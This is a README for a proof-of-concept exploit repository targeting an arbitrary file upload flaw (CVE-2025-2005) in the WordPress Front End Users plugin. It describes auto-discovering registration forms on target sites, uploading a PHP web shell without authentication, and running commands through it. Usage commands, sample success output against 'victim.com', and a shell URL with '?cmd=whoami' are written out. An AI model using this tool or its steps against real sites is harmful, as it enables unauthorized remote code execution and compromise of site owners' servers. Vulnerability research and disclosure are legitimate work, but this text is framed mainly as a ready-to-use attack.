WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)# WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
This repository provides a Proof of Concept (PoC) exploit for the WordPress Front End Users plugin (versions up to 3.2.32), which is vulnerable to arbitrary file upload due to missing MIME/file-type validation in its registration form.This allows unauthenticated attackers to upload malicious files (e.g., web shells), potentially leading to Remote Code Execution (RCE) on the server.
## Features
- CVE-2025-2005: WordPress Front End Users plugin file upload vulnerability
- Simple command-line interface
- Auto-discovery of registration forms
- Shell uploader with custom username/password
## How It Works
- It sends a registration request to the vulnerable FEUP registration form.
- Uploads a PHP shell via the file input field, bypassing file-type restrictions.
- Displays the upload status and informs if the site is vulnerable.
## Testing Targets
* Looks for registration forms containing:
* ewd-feup-register-form
* On URLs such as:
```
/register/
/signup/
```
* or any link found on homepage
## Getting Started
- Python 3.x
- requests and beautifulsoup4 modules:
```
pip install requests beautifulsoup4
```
## Installation
```
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
```
## Usage
```
python3 exploit.py --url http://target.com --user hacker --password pass123
```
## Sample Output
```
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
```
## Run Exploit
```
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
```
[4.0K] /data/pocs/3e5c32bc982503cc806accb5737a4566c53ff9e0
├── [3.0K] exploit.py
└── [1.7K] README.md
0 directories, 2 files